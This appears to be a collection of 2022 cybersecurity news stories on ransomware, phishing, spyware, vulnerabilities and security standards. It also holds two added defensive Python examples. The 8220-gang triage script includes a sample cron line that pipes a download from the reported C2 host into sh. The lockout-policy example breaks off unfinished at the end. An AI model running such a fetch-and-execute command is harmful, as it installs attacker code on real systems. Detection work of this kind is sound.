
Zero Trust: The Need of the Hour


The continuous growth of network landscapes has shown that traditional security methods such as perimeter-based security architectures lack the finesse and control required to safeguard against new risks, both internal and external; a new security technique is therefore the need of the hour. 

Zero Trust: an all-in-one solution 

To mitigate future risks, Zero Trust, a security model designed in 2010 by John Kindervag of Forrester Research, will play an important role. It is a simple concept: trust nothing, scan everything. 

The model operates on the belief that by eliminating implicit trust and enforcing strong identity and access management (IAM) controls, businesses can ensure that only verified individuals, devices and apps can gain access to an organization's systems. It greatly reduces the threat of unauthorized access, insider threats, and malicious assaults. 

Attackers specifically target small and medium-sized businesses because of their weaker security infrastructure. Recent research found that 94% of small firms face multiple challenges in maintaining their security posture because of a lack of skilled security personnel (40%), excessive manual analysis (37%), and the increasingly remote workforce (37%). 

According to a recent IBM report, zero trust lowers the cost of data breaches by 43%. Additionally, Illumio reported that zero-trust segmentation saves nearly 40 hours per week and mitigates an average of five cyber attacks a year in a typical organization. 

The future of zero trust 

Over the past decade, zero trust has evolved from a concept discussed to tighten security into a widely deployed approach to securing organizations around the globe. According to the 2021 Microsoft report, 76% of organizations have at least started implementing a zero-trust strategy, while 35% believe they have fully implemented it. 

However, multiple threat analysts believe that most organizations across all sectors have more work to do. Because zero trust requires layers of policies and technologies, the tools that can be employed will need to advance, along with the ways organizations deploy and use them.

The American government has already urged state and local governments, as well as universities and critical infrastructure firms, to move to a verify-then-trust principle. 

To help move zero trust forward, organizations around the globe will need to overhaul the entire cybersecurity department, as the current security team may not have the skills, experience, or staff, and they may need to recruit additional staff or services. 

During any transition period, security teams must practice tightly controlled change management throughout, as hackers continue to challenge security infrastructures. Businesses, specifically those with limited cybersecurity resources, as well as federal agencies, have an increasingly urgent need to implement zero trust.

Critical Bug Identified in Kingspan TMS300 CS Water Tank Management System


Malicious hackers can remotely exploit a critical vulnerability in a water tank management system used by organizations in over 40 countries worldwide, and the manufacturer has not shown any inclination towards fixing the bug. 

The affected product is designed by the water and energy wing of Kingspan, a building materials firm headquartered in Ireland. The Kingspan TMS300 CS water tank management system uses multiple mediums, including a screen, web server, application, online portal, and email, to offer information on its products. It features wired and wireless multi-tank level measurements, alarms, and internet or local network connectivity. 


Earlier this week, Maxim Rupp, a researcher at CISA, published an advisory regarding the product, which is impacted by a critical vulnerability caused by inadequately implemented access-control rules; the flaw allows an unauthenticated attacker to view or alter the product’s settings. 

The vulnerability lets an attacker reach the product’s settings without authenticating, merely by requesting specific URLs. These URLs can be identified by browsing the web interface or via a brute-force attack, the researcher explained. The flaw, tracked as CVE-2022-2757, has received a CVSS score of 9.8. 

An attacker can exploit the security bug to alter various settings, including ones related to sensors, tank details, and alarm thresholds, from virtually any part of the world, as long as they have access to the device’s web interface, Rupp explained. 

According to CISA, the impacted product is used worldwide in the water and wastewater systems sector, and altering these settings could allow a hacker to cause some disruption in the targeted organization. 

“Kingspan has not responded to requests to work with CISA to mitigate these vulnerabilities. Users of the affected product are encouraged to contact Kingspan customer support for additional information,” the researcher added. 

Mitigation Tips 

CISA has provided the following recommendations for minimizing the threat posed by these types of vulnerabilities. 

• Limit network exposure for all control system devices and/or systems, and ensure they are not reachable from the Internet. 
• Locate control system networks and remote devices behind firewalls and isolate them from enterprise networks. 
• If necessary, employ secure methods, such as Virtual Private Networks (VPNs), to access the devices.

Spyware Group ‘Knotweed’ Employs Windows and Adobe Bugs to Target Firms Worldwide


Microsoft has unearthed an Austrian “cyber mercenary” group that has been employing Windows and Adobe exploits to target organizations with spyware since at least 2021. 

Security analysts at Microsoft’s Threat Intelligence Center and Security Response Center said the organization is a private-sector offensive actor (PSOA) called Decision Supporting Information Research Forensic (DSIRF), which Microsoft tracks under the codename Knotweed. 

The cyber-weapons broker has launched multiple attacks on law firms, banks, and strategic consultancies in countries across the globe via spyware — dubbed Subzero — that allows its users to remotely and silently infiltrate a victim’s computer, phone, network infrastructure, and internet-linked devices.

"DSIRF has been linked to the development and attempted sale of a malware toolset called Subzero, which enables customers to hack into their targets' computers, phones, network infrastructure, and internet-connected devices," Microsoft said in a blog post. 

DSIRF promotes Subzero as a “next generation cyber warfare” tool that can secure full control of a victim’s PC, steal passwords and disclose its real-time location, according to a copy of an internal presentation released by Netzpolitik, a German news website, in 2021. 

The report claims that DSIRF, which reportedly has links to the Russian state, promoted its tool for use during the 2016 U.S. presidential election. The German government was also considering the purchase and use of Subzero to enhance its cyber defense. 

Microsoft said it has issued a software update to mitigate the identified vulnerabilities. The tech giant has also released signatures for the malware to shield Windows users from the exploits Knotweed was employing to deliver it. 

More action is needed at a broader level, given that DSIRF will not be the last PSOA to target organizations, Microsoft researchers explained in a brief sent to Congress on Wednesday. 

"We are increasingly seeing PSOAs selling their tools to authoritarian governments that act inconsistently with the rule of law and human rights norms," researchers explained. "We welcome Congress's focus on the risks and abuses we all collectively face from the unscrupulous use of surveillance technologies and encourage regulation to limit their use both here in the United States and elsewhere around the world."

Microsoft Warns of '8220 Group' Targeting Linux Servers


Microsoft Security Intelligence experts have issued a new warning against a known cloud threat actor (TA) group, dubbed 8220, targeting Linux servers to install crypto miners. 

“We observed notable updates to the long-running malware campaign targeting Linux systems by a group known as the 8220 gang. The updates include the deployment of new versions of a crypto miner and an IRC bot, as well the use of an exploit for a recently disclosed vulnerability,” the technology giant wrote in a series of tweets. 

According to Cisco's Talos Intelligence group, the 8220 gang has been operating since at least 2017 and primarily focuses on crypto mining campaigns. The threat actors are Chinese-speaking, and the group's name comes from the port number 8220 that the miner uses to communicate with its C2 servers. 

Over the past year, the group has actively upgraded its methods and payloads. In a recent campaign, the group targeted i686 and x86_64 Linux systems and employed RCE exploits for CVE-2022-26134 (Atlassian Confluence) and CVE-2019-2725 (Oracle WebLogic) for initial access, Microsoft researchers stated. 

Once access to a target system is secured, an evasive loader is downloaded from jira[.]letmaker[.]top. The loader evades detection by clearing log files and disabling cloud monitoring and security tools. 

Subsequently, the loader downloads the pwnRig crypto miner and an IRC bot that runs commands from a command-and-control (C2) server. It then maintains persistence by creating either a cron job or a script that runs every 60 seconds under nohup. 

“The loader uses the IP port scanner tool ‘masscan’ to find other SSH servers in the network and then uses the GoLang-based SSH brute force tool ‘spirit’ to propagate. It also scans the local disk for SSH keys to move laterally by connecting to known hosts.” 

To guard networks against this threat, Microsoft urged organizations to secure systems and servers, apply updates, and use good credential hygiene, adding that “Microsoft Defender for Endpoint on Linux detects malicious behaviors and payloads related to this campaign.” 
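A small triage helper, added here as an illustration and not part of Microsoft's or Talos's write-ups, that looks for the persistence pattern described above (a cron job or a 60-second loop that downloads or backgrounds a payload with curl, wget or nohup) and for the loader host named in the report. The crontab lines and the shell script it runs over are constructed samples; the URL path and process name in them are placeholders.

```python
"""Triage crontab entries and shell scripts for 8220-style persistence.

Signals checked, following the behaviour described in the write-up:
  * a job scheduled every minute, or a loop sleeping 60 seconds
  * a download with curl/wget, or backgrounding with nohup
  * a reference to the loader host named in the report
Sample inputs are constructed for this example, not captured artifacts.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

EVERY_MINUTE = re.compile(r"^(\*|\*/1)(\s+\*){4}\s+")        # "* * * * * cmd"
DOWNLOADER = re.compile(r"\b(curl|wget)\b")
BACKGROUND = re.compile(r"\bnohup\b")
SLEEP_LOOP = re.compile(r"\bwhile\b.*?\bdo\b.*?\bsleep\s+60\b", re.S)

# Host from the write-up, kept defanged as on the page; refang() restores the
# dots so it can be matched against raw command lines.
KNOWN_C2_HOSTS = {"jira[.]letmaker[.]top"}


def refang(indicator: str) -> str:
    return indicator.replace("[.]", ".")


@dataclass
class Finding:
    source: str
    text: str
    reasons: List[str]


def _common_reasons(text: str) -> List[str]:
    reasons = []
    if DOWNLOADER.search(text):
        reasons.append("downloads with curl/wget")
    if BACKGROUND.search(text):
        reasons.append("backgrounds with nohup")
    for host in KNOWN_C2_HOSTS:
        if refang(host) in text:
            reasons.append(f"references known C2 host {host}")
    return reasons


def _worth_raising(reasons: List[str]) -> bool:
    # A frequent schedule or a lone download is common in legitimate jobs;
    # require two signals, unless a known C2 host appears.
    return len(reasons) >= 2 or any("C2" in r for r in reasons)


def triage_crontab(text: str, source: str = "crontab") -> List[Finding]:
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        reasons = (["runs every minute"] if EVERY_MINUTE.match(line) else [])
        reasons += _common_reasons(line)
        if _worth_raising(reasons):
            findings.append(Finding(source, line, reasons))
    return findings


def triage_script(text: str, source: str) -> Optional[Finding]:
    reasons = (["60-second loop"] if SLEEP_LOOP.search(text) else [])
    reasons += _common_reasons(text)
    return Finding(source, text, reasons) if _worth_raising(reasons) else None


# Constructed sample crontab: one benign renewal job and two suspicious entries.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
* * * * * curl -fsSL http://jira.letmaker.top/loader-placeholder | sh
*/1 * * * * nohup /tmp/.x/run.sh >/dev/null 2>&1
"""

# Constructed sample script: restarts a placeholder process every 60 seconds.
SAMPLE_SCRIPT = """\
#!/bin/sh
while true; do
  pgrep -x miner-placeholder >/dev/null || nohup /tmp/.x/miner-placeholder &
  sleep 60
done
"""

if __name__ == "__main__":
    for f in triage_crontab(SAMPLE_CRONTAB):
        print(f"[{f.source}] {f.text}\n    -> {', '.join(f.reasons)}")
    hit = triage_script(SAMPLE_SCRIPT, "/tmp/.x/run.sh")
    if hit:
        print(f"[{hit.source}] -> {', '.join(hit.reasons)}")
```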

The findings come after Akamai disclosed that the Atlassian Confluence vulnerability is still seeing a steady 20,000 exploitation attempts per day, executed from nearly 6,000 IPs. These figures nevertheless represent a substantial decline from the peak of 100,000 the company witnessed after the bug's disclosure on June 02, 2022.

Artificial Intelligence: Main Weapon to Counter Cyber Attacks


The cyberattack surface in modern business environments is huge, and it continues to evolve at a rapid pace. Cybersecurity staff often find themselves in a tricky situation managing their cyber defenses. 

Threat actors are embracing AI and ML whole-heartedly, launching more sophisticated attacks that quickly learn and adapt to our inadequate defenses. On average, a business receives 10,000 alerts every day from the multiple software tools it uses to monitor cyber threats. Compounding the problem, there is a huge shortage of skilled security analysts, and those available don’t want to be burdened by repetitive manual work. 

These challenges underscore the need for better ways to stem the tide of cyber-attacks. Artificial intelligence is particularly well suited to analyzing and enhancing an organization’s cybersecurity posture. AI can help automate many tasks that a human analyst would otherwise handle manually, such as automatically discovering unknown workstations, servers, code repositories, and other hardware and software on a network. 

Leading firms including FireEye, Microsoft, and Google are developing innovative AI approaches to detect malware and monitor the spread of fake news. One notable success is Microsoft’s Cyber Signals program, which uses AI to analyze 24 trillion security signals, 40 nation-state groups, and 140 hacker groups to produce cyber threat intelligence for C-level executives. 

American Federal agencies such as the Department of Defense and the National Science Foundation have invested tens of millions of dollars to develop advanced AI tools for extracting insights from data generated from the dark web and open-source software platforms such as GitHub. 

Additionally, AI-enabled analytics can assist in cracking the jargon and code words attackers develop to refer to their new tools, techniques, and procedures. One example is using the name Mirai to mean botnet. Hackers developed the term to hide the botnet topic from law enforcement and cyberthreat intelligence professionals. 

The path ahead 

Looking forward, there is massive room for growth for AI in cybersecurity. In particular, the predictions AI systems make based on the patterns they identify will help security analysts respond to emerging threats. 

AI is an intriguing tool that could help stem the tide of cyberattacks and, with careful cultivation, it could become a required tool for the next generation of cybersecurity professionals. The current pace of innovation in AI, however, suggests that fully automated cyber battles between AI attackers and AI defenders are likely years away.

New Variant of Magniber Ransomware is Targeting Windows 11 Users


Security analysts at 360 Security Center have unearthed a new strain of Magniber ransomware targeting Windows 11 systems. Since May 25, the attack volume of Magniber has surged significantly, and its primary distribution package names have also been updated, for example win10-11_system_upgrade_software.msi and covid.warning.readme.xxxxxxxx.msi. 

The ransomware is propagated via several online platforms, including cracked software websites and fake pornographic websites. When users visit these phony websites, they are lured into downloading from third-party network disks. 

According to researchers, the ransomware itself has not changed much, and it can target multiple versions of Windows. The ransomware uses a combination of RSA and AES to encrypt files; the RSA key is 2048 bits long, which is currently difficult to crack technically. 

After encryption, files receive a random suffix, and each victim gets a separate payment page. If the ransom is not paid within the specified time, the link becomes invalid. If the victim pays within 5 days, they only need to pay 0.09 Bitcoin; otherwise the ransom is doubled after 5 days. 

This is the second incident within two months in which hackers have targeted Windows users this way. Earlier in April, the malicious actors employed fake Windows 10 updates to spread the Magniber ransomware strain. The fake Windows 10 updates were distributed under multiple names such as Win10.0_System_Upgrade_Software.msi and Security_Upgrade_Software_Win10.0.msi via platforms such as pirated sites, posing as legitimate cumulative or security updates. 

The malicious campaign started on April 8th, 2022, and has witnessed massive distribution worldwide since then. Meanwhile, it remains unclear how the fake Windows 10 updates are being promoted and distributed from fake warez and crack sites. 

According to security researchers, no safe decryptor exists for the ransomware, and no weaknesses of the malware are known as yet that would reverse its infection. The ransomware presently targets regular users and students, not corporate customers. Thus, users need to remain vigilant, avoid downloading cracked versions, and use legitimate sites only. 

The ransomware was first spotted in 2017 targeting victims in South Korea. Back in 2021, the ransomware was using the PrintNightmare exploit to target Windows users, and earlier this year, in January, it was distributed via Microsoft Edge and Chrome.

Multiple Organizations Targeted by Conti Ransomware Worldwide


The Conti ransomware gang is wreaking havoc with its assaults around the globe. The latest victim is the Peru MOF – Dirección General de Inteligencia (DIGIMIN), the premier intelligence agency in Peru. 

The ransomware group claimed to have stolen 9.41 GB of data from the agency responsible for national, military, and police intelligence, as well as counterintelligence. Targeting an intelligence agency could lead to the disclosure of secret and confidential documents and pose a threat to national security. 

Last week, the US Department of State offered a reward of up to $15 million for information on the threat actor. The reward includes $10 million for the identification or the location of the leaders of the Conti ransomware gang. 

Additionally, $5 million is offered for information that results in the arrest and/or conviction of any individual in any country conspiring to participate in or attempting to participate in a Conti variant ransomware incident. The reward is offered under the Department of State’s Transnational Organized Crime Rewards Program (TOCRP).

"The Conti ransomware group has been responsible for hundreds of ransomware incidents over the past two years," the statement read. "The FBI estimates that as of January 2022, there had been over 1,000 victims of attacks associated with Conti ransomware with victim payouts exceeding $150,000,000, making the Conti ransomware variant the costliest strain of ransomware ever documented." 

Costa Rica President Rodrigo Chaves declared a national cybersecurity emergency over the weekend, following a financially motivated Conti ransomware attack against his administration that has paralyzed the government and economy of the Latin American nation. Shortly after the incident occurred in April, the former President Carlos Alvarado publicly declined to pay a $10 million ransom demand. In turn, Conti has published nearly all of the 672 GB of data stolen from the government. 

After targeting the Costa Rican government, the ransomware group posted a message on its news site saying the assault was merely a “demo version.” The group also said the attack was motivated solely by financial gain, while expressing general political disgust, another signal of more government-directed attacks to come. 

The assaults by the Conti ransomware group are deeply concerning and have even forced a nation to declare a national emergency. Security experts therefore recommend that organizations invest in robust preventive strategies, including anti-ransomware solutions, frequent data backups, network firewalls, and email gateways.

Scammers Employ Instagram Stories to Target Users


Instagram is the fourth most popular social media platform in the world, with over one billion monthly active users. Almost everyone, from celebrities to your kids, has an Instagram account. This global success makes it a very lucrative target for threat actors. 

According to the BBC, scamming has worsened over the past year, with Instagram fraud reports increasing by 50% since the coronavirus outbreak began in 2020. Scammers need only a handful of people who will help someone without thinking. And since they’re not after money, just a bit of someone’s time, they already have one foot in the door. 

The latest scam involves Instagram backstories. Fraudsters will ask you for help, tell their backstory, and put their fate in your hands. Here are some of the stories that fraudsters employ to target users: 

• "I’m launching my own product line." 
• "I’m in a competition and need you to vote for me." 
• "I’m trying to get verified on Instagram and need people to confirm my fanbase with a link."
• "I need a help link to get into Instagram on my other phone." This is the most common tactic employed by scammers. 
• "I’m contesting for an ambassadorship spot at an online influencers program." This one is surprisingly popular, with fake influencers everywhere. 

Scammers try to get access to your Instagram account by sending you a suspicious link, either as an Instagram direct message or via email. They then ask you not to click the link but merely to take a screenshot and send the image back to them. The link is a legitimate Instagram “forgotten password” URL for your account, and fraudsters want you to screenshot it so they can use the URL to reset your password, take over your account, and lock you out. 

Any request for a link screenshot should be treated with extreme suspicion. Whether it mentions product lines or ambassador programs, you can safely ignore these messages. If you think you’ve been scammed, report it to Instagram, change your password, and enable two-factor authentication. If you reuse passwords, a scammer could break into more of your accounts, so change those passwords too.

Magniber Ransomware Tricking Users via Fake Windows 10 Updates


Security analysts have unearthed a new ransomware campaign targeting Windows systems. Malicious actors are using fake Windows 10 updates to spread the Magniber ransomware strain. 

Since April 27, users around the world have been posting their stories on the BleepingComputer forum seeking a solution. According to the publication, these fake Windows 10 updates are being distributed under multiple names such as Win10.0_System_Upgrade_Software.msi and Security_Upgrade_Software_Win10.0.msi via platforms such as pirated sites, posing as legitimate cumulative or security updates.

Aside from these files, there are also other installers posing as Microsoft knowledge base articles that install the Magniber ransomware: 

• System.Upgrade.Win10.0-KB47287134.msi 
• System.Upgrade.Win10.0-KB82260712.msi 
• System.Upgrade.Win10.0-KB18062410.msi 
• System.Upgrade.Win10.0-KB66846525.msi

Based on the submissions to VirusTotal, this malicious campaign appears to have started on April 8th, 2022 and has seen massive distribution worldwide since then. Meanwhile, it remains unclear how the fake Windows 10 updates are being promoted and distributed from fake warez and crack sites. 

Once installed, Magniber will erase shadow volume copies and then encrypt files. When encrypting files, the ransomware appends a random 8-character extension, such as .gtearevf. The ransomware also drops a README.html document in each folder it encrypts. These documents direct users to Magniber’s Tor payment site, called 'My Decryptor'.

The payment site allows a victim to decrypt one file for free, contact 'support', or obtain the cryptocurrency address to send coins to if they decide to pay the ransom. The ransom demands tend to be around $2,500 or 0.068 bitcoin, Bleeping Computer reported. 

“The only 1 way to decrypt your files is to receive the private key and decryption program,” the ransom note reads. “Any attempts to restore your files with the third-party software will be fatal for your files!”

According to security researchers, no safe decryptor exists for the ransomware, nor are any weaknesses of the malware known that would reverse its infection. The ransomware presently targets regular users and students, not corporate customers. Thus, users need to remain vigilant, avoid downloading cracked versions, and use legitimate sites only. 

The ransomware was first spotted in 2017 targeting victims in South Korea. Back in 2021, the ransomware was using the PrintNightmare exploit to target Windows users, and earlier this year, in January, it was distributed via Microsoft Edge and Chrome.

Beware of New Phishing Campaign Targeting Facebook Users


Facebook users need to remain vigilant after researchers at Abnormal Security uncovered a new phishing campaign designed to steal passwords from admins who run company Facebook pages. The scam begins with the victim being sent a phishing email claiming to be from 'The Facebook Team’. 

The email warns that the user's account might be disabled or the page might be removed over repeatedly posting content that infringes on someone else’s rights. 

Once the victim has been scared into thinking their Facebook profile could soon be taken down, they are invited to appeal the report by clicking a link that, the security researchers said, goes to a Facebook post; within this post there is another link that directs users to a separate website. To file an ‘appeal’, the Facebook user is told to enter sensitive information including their name, email address, and Facebook password. 

All this information is sent to the threat actor, who can use it to log in to the victim's Facebook page, gather sensitive details from their account, and potentially lock them out of it. If the victim reuses their Facebook email address and password for other websites and applications, the attacker can access those too. One reason phishing attacks like this succeed is that they create a sense of urgency. 

“What makes this attack interesting (and particularly effective) is that the threat actors are leveraging Facebook’s actual infrastructure to execute the attack. Rather than sending the target straight to the phishing site via a link in the email, the attackers first redirect them to a real post on Facebook. Because the threat actors use a valid Facebook URL in the email, it makes the landing page especially convincing and minimizes the chance the target will second-guess the legitimacy of the initial email,” researchers explained. 

“In addition, it appears the attackers are targeting accounts of people who manage Facebook Pages for companies. For these individuals, a disabled Facebook account wouldn’t just be an inconvenience; it could have an impact on their marketing, branding, and revenue. If they believed their account was at risk, they would be particularly motivated to act quickly.” 

If you have already been a victim of this campaign, or want to stay safe from any future threats, Facebook on its website has issued recommendations for its users. The social network advises anyone who thinks they’ve fallen for a phishing scam to report it, change their password, and make sure they log out of any devices they don’t recognize. Facebook also recommends users turn on multi-factor authentication, which helps to add an extra level of security to their account.

Critical Vulnerability Identified in Ever Surf Blockchain Wallet


A vulnerability identified in the browser version of the Ever Surf blockchain wallet could have allowed attackers full control over a victim’s wallet and its funds, say threat analysts at Check Point Research. 

Available on Google Play and the Apple iOS Store, Ever Surf is described as a cross-platform messenger, blockchain browser, and crypto wallet for the Everscale blockchain network. It currently has nearly 670,000 active accounts worldwide and claims to have facilitated at least 31.6 million transactions.

According to Check Point researchers, the web version of the Ever Surf wallet suffered from a relatively simple bug that allowed malicious actors to extract private keys and seed phrases stored in local browser storage. To do that, threat actors first needed to obtain the wallet's encrypted keys, which is usually done via malicious browser extensions, infostealer malware, or plain old phishing.

Subsequently, the bad actors could have used a simple script to perform the decryption. The weakness made decryption possible in “just a couple of minutes, on consumer-grade hardware," the researchers stated. 

CPR reported the vulnerability to the Ever Surf developers, who then published a desktop version that mitigates the flaw, the company said in a press release. The web version is now declared deprecated and should only be used for development purposes. Seed phrases from accounts that hold real value in crypto should not be used in the web version of Ever Surf, the researchers warned. 

“Everscale is still in the early stages of development. We assumed that there might be vulnerabilities in such a young product,” said Alexander Chailytko, Cyber Security, Research & Innovation Manager at Check Point Software. 

“When working with cryptocurrencies, you always need to be careful, ensure your device is free of malware, do not open suspicious links, and keep OS and antivirus software updated. Despite the fact that the vulnerability we found has been patched in the new desktop version of the Ever Surf wallet, users may encounter other threats such as vulnerabilities in decentralized applications, or general threats like fraud, phishing,” Chailytko added. 

To mitigate the risks, researchers recommended that users not follow suspicious links, particularly those sent from unknown sources, always keep their OS and antivirus software updated, and avoid downloading any software or browser extensions before verifying the identity of the source.

FBI Issues Warning as BlackCat Ransomware Targets More Than 60 Organizations Worldwide


An FBI flash alert released this week suggests that the law enforcement agency has identified at least 60 ransomware attacks worldwide by the BlackCat (ALPHV) group between November 2021 and March 2022. 

The flash alert highlights the tactics, techniques, and procedures (TTPs) employed and indicators of compromise (IOCs) associated with ransomware groups spotted during FBI investigations.

According to the FBI's Cyber Division, BlackCat, also tracked as ALPHV and Noberus, "is the first ransomware group to do so successfully using RUST, considered to be a more secure programming language that offers improved performance and reliable concurrent processing."

BlackCat's ransomware executable is also highly customizable and is loaded with several encryption methods and options that make it easy to adapt attacks to a wide range of industrial organizations. "Many of the developers and money launderers for BlackCat/ALPHV are linked to Darkside/Blackmatter, indicating they have extensive networks and experience with ransomware operations," the FBI added. 

Security researchers recently revealed an increased interest from BlackCat operators in targeting industrial organizations. BlackCat affiliates often demand ransom payments of millions of dollars, but they have been observed accepting lower payments after negotiations with their victims. 

For initial access, the FBI explains, BlackCat uses compromised user credentials. Next, Active Directory user and administrator accounts are compromised and malicious Group Policy Objects (GPOs) are used to deploy the ransomware, but not before victim data is exfiltrated. 

In observed BlackCat attacks, PowerShell scripts, Cobalt Strike Beacon, and legitimate Windows tools and Sysinternals utilities have been used. The malicious actors were also seen disabling security features to move unhindered within the victim’s network. 

As usual, the FBI recommends not paying the ransom, as this would not guarantee the recovery of compromised data, and urges organizations to proactively deploy cybersecurity defenses that can help them prevent ransomware attacks. 

Since the start of the year, the notorious group has taken credit for ransomware attacks on US schools like Florida International University and North Carolina A&T University and has already breached dozens of US critical infrastructure organizations. 

The group was first spotted in November 2021 and became known for aggressively posting details about its victims publicly. Emsisoft threat analyst Brett Callow and others previously said the group is a rebrand of the BlackMatter and DarkSide ransomware groups, something the FBI also highlighted in its notice.

Cyware is Changing the Cybersecurity Landscape


Cybercriminals often have technical prowess equivalent or even superior to that of their cybersecurity counterparts. This has led to an ever-evolving landscape of cybercrime that constantly outsmarts modern cybersecurity technologies. So, does that end our fight against cyber threats? No; the answer lies in greater awareness and implementation of automation technologies.

Akshat Jain, CTO & Co-founder of Cyware, shared his vision and the role of automation technologies in eliminating cyber threats. Here are the key points he discussed in an interview with Elets CIO:

The vision of Cyware 

Anuj Goel and I started the company in 2016 with the vision of assisting organizations to reimagine the way they approach and manage cybersecurity. Our prior experiences in steering large security and technology teams made us realize the inadequacies of reactive, manually-driven, and intelligence-deprived cybersecurity strategies that put organizations at a disadvantage against threat actors. 

Today, Cyware is helping organizations transform their security postures through our cyber fusion solutions that combine the capabilities of Threat Intel Platforms (TIP) and Security Orchestration, Automation, and Response (SOAR) to make security proactive and to integrate and accelerate different security functions, including threat detection, response, vulnerability management, threat hunting, and others. 

Role of Automation in advanced security operations 

Automation plays an important role in the enrichment, correlation, analysis, and last-mile delivery of threat intelligence to different teams within an organization, and to external partners, industry peers, regulatory bodies, information sharing community (ISAC/ISAO) members, and others. Using this intelligence, they are expected to take mitigating actions to contain and respond effectively to those threats.

“Automation assists in detecting the variety of threats by using historical indicators of compromise (IOCs), and the knowledge of threat actors’ tactics, techniques, and procedures (TTPs) to trigger machine-driven detection alerts. From there, security teams can once again automate containment actions to ensure that a threat does not spread laterally across their systems and networks, thereby minimizing the impact of a threat. 

Response actions needed to finally eliminate the threat can also be executed rapidly through automated workflows leveraging security orchestration for information exchange and actioning across a variety of tools,” Jain explained. 

Importance of Cyber Innovation and Global Collective Defence in the cloud-first economy

Cyber innovation is the need of the hour to help organizations adopt new security technologies and strategies to deal with these new challenges. With the increasingly distributed nature of today’s work environment, it is essential to boost collaboration in cybersecurity across all sectors to develop collective defense strategies for resilient cyberspace for all. 

As threat actors become stealthier and quicker, organizations should also make smart use of threat intel collected from both internal and external sources to drive proactive actions against potential threats to their infrastructure. 

Cyware’s progress in designing a first-of-its-kind global collective defense network 

Cyware is creating the first-of-its-kind global collective defense network through its advanced cross-sectoral threat intel sharing platforms that link all the stakeholders within an organization, as well as its business partners, vendors, industry peers, national CERTs, information sharing communities (ISACs/ISAOs), and others.

The network will assist organizations in sharing strategic, tactical, technical, and operational threat intelligence in real-time to ensure a timely response to various threats. More than 20 information-sharing communities (ISACs, ISAOs, and CERTs) from financial services, automotive, space, aviation, healthcare, retail, energy, and manufacturing sectors, among others, are using Cyware’s solutions to share threat intelligence with their 10,000+ member organizations.

PCI DSS Launches New Version to Tackle Cyber Security Threats

A new version of the PCI Data Security Standard (PCI DSS) has been published today by the PCI Security Standards Council (PCI SSC), the global payment security forum. Version 4.0 of the standard offers a baseline of operational and technical requirements designed to improve payment security, replacing version 3.2.1 to help combat emerging threats and technologies. The updates are also built to enable innovative methods of tackling these new threats.

PCI SSC says these changes were motivated by feedback from the global payments industry over the past three years, including more than 6,000 items from over 200 organizations. The latest changes in PCI DSS v4.0 include:

• Expansion of Requirement 8 to apply multi-factor authentication (MFA) for all access to the cardholder data environment.
• Updated firewall terminology to "network security controls", supporting a wider range of technologies used to meet the security objectives previously fulfilled by firewalls.
• Improved flexibility for enterprises to show how they are using different techniques to meet security objectives.
• Targeted risk analyses that let organizations decide how frequently they perform certain activities, based on their own risk exposure and needs.

The current version, v3.2.1, will remain active for two years, until March 31, 2024, giving affected organizations time to learn v4.0 and implement these updates. PCI SSC has also released supporting documents alongside the updated standard in the PCI SSC Document Library.

It includes the summary of changes from PCI DSS v3.2.1 to v4.0, v4.0 Report on Compliance (ROC) Template, ROC FAQs, and ROC Attestations of Compliance (AOC). Additionally, Self-Assessment Questionnaires (SAQs) will be posted in the future. “The industry has had unprecedented visibility into, and impact on, the development of PCI DSS v4.0. Our stakeholders provided substantial, insightful, and diverse input that helped the council effectively advance the development of this version of the PCI Data Security Standard,” said Lance Johnson, executive director of PCI SSC.

US Federal Agencies Warn of Cyber Attacks Targeting UPS Devices


The US Cybersecurity and Infrastructure Security Agency (CISA) and the Department of Energy released a joint advisory warning for U.S. organizations to secure Internet-connected uninterruptible power supply (UPS) devices from ongoing cyber assaults.

UPS devices are regularly used as emergency power backup solutions in mission-critical environments and are also equipped with an internet of things (IoT) capability, enabling the administrators to carry out power monitoring and routine maintenance. But as is often the case, such features also expose them to malicious attacks. 

"The Cybersecurity and Infrastructure Security Agency (CISA) and the Department of Energy are aware of threat actors gaining access to a variety of internet-connected uninterruptible power supply (UPS) devices, often through unchanged default usernames and passwords," the federal agencies said.

"Organizations can mitigate attacks against their UPS devices, which provide emergency power in a variety of applications when normal power sources are lost, by removing management interfaces from the internet." 

To safeguard against such threats, CISA and DoE recommend that affected entities ensure all UPS systems are disconnected from the internet. If disconnecting the management interfaces from the Internet is not viable, admins are advised to put the devices behind a virtual private network (VPN), enable multifactor authentication (MFA), and use strong passwords or passphrases in accordance with National Institute of Standards and Technology guidelines.

Additionally, the advisory recommends auditing usernames and passwords to ensure that they're not still factory-default or otherwise easily guessed or cracked. U.S. organizations are also urged to enforce login timeout/lockout policies to mitigate these ongoing assaults against UPSs and similar systems. Besides default credentials, malicious actors can also exploit critical security flaws to take over UPS devices remotely, allowing them to burn the devices out or cut power remotely.
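The advisory's "login timeout/lockout" recommendation is easy to state and easy to get subtly wrong (counters that never expire, locks that a correct password can bypass, unknown usernames that are not counted). The block below is an added example, not code from the CISA/DoE advisory or from any UPS vendor: a small, deterministic lockout policy that a device management interface, or a reverse proxy placed in front of one, could enforce. The credential store, the `admin` account and all timings are constructed for the demo, and time is passed in explicitly so the behaviour can be exercised without sleeping.

```python
"""Login timeout/lockout policy of the kind the CISA/DoE UPS advisory recommends.

Added example (not from the advisory or any vendor). Timestamps are plain
numbers supplied by the caller so the policy is testable and clock-independent.
"""
import hmac
from dataclasses import dataclass, field


@dataclass
class LockoutPolicy:
    max_failures: int = 5        # failed attempts tolerated inside the window
    window_seconds: int = 300    # sliding window over which failures are counted
    lockout_seconds: int = 900   # how long the account stays locked afterwards
    _failures: dict = field(default_factory=dict)      # account -> failure timestamps
    _locked_until: dict = field(default_factory=dict)  # account -> unlock timestamp

    def is_locked(self, account: str, now: float) -> bool:
        until = self._locked_until.get(account)
        if until is None:
            return False
        if now >= until:
            # Lockout expired: clear the lock and the stale failure history.
            del self._locked_until[account]
            self._failures.pop(account, None)
            return False
        return True

    def record_failure(self, account: str, now: float) -> bool:
        """Register a failed login; returns True if the account is now locked."""
        if self.is_locked(account, now):
            return True
        recent = [t for t in self._failures.get(account, [])
                  if now - t < self.window_seconds]
        recent.append(now)
        self._failures[account] = recent
        if len(recent) >= self.max_failures:
            self._locked_until[account] = now + self.lockout_seconds
            return True
        return False

    def record_success(self, account: str) -> None:
        """A successful login clears the failure counter for that account."""
        self._failures.pop(account, None)


# Constructed credential store for the demo. A real device must store salted
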